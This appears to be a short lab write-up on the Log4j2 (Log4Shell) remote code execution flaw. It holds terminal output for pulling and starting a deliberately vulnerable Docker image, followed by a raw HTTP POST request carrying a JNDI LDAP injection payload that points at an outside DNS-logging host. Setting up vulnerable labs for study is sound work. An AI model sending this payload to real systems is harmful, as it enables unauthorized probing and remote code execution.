Log4j2 RCE漏洞及靶场搭建

┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
Using default tag: latest
latest: Pulling from fengxuan/log4j_vuln
Digest: sha256:d929cad3243483f2f3cec6b7281a02873d9e6661dc00b5f0313429c04912d71d
Status: Image is up to date for registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln:latest
registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln:latest
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
8b707e3bc843cc4adc64b97a7237bf887ff6b31d5156d66a930b6b8861138a9b
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# docker exec -it log4j_vuln_container /bin/bash
[root@8b707e3bc843 ansible]# /bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh
Using CATALINA_BASE:   /home/apache-tomcat-8.5.45
Using CATALINA_HOME:   /home/apache-tomcat-8.5.45
Using CATALINA_TMPDIR: /home/apache-tomcat-8.5.45/temp
Using JRE_HOME:        /usr/local/jdk1.8.0_144/
Using CLASSPATH:       /home/apache-tomcat-8.5.45/bin/bootstrap.jar:/home/apache-tomcat-8.5.45/bin/tomcat-juli.jar
Tomcat started.
[root@8b707e3bc843 ansible]#

http://127.0.0.1:8080/webstudy/hello-fengxuan

POST /webstudy/hello-fengxuan HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: hblid=OCkAkPEOWHj8QX5o3m39N0H02BOA0I12; olfsk=olfsk8528760320823083; ECS[visit_times]=1; private_content_version=e48e945c4e066c5afa30b51edd7c4541; pma_lang=en; pma_collation_connection=utf8_unicode_ci
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
c=${jndi:ldap://bb772939.dns.1433.eu.org}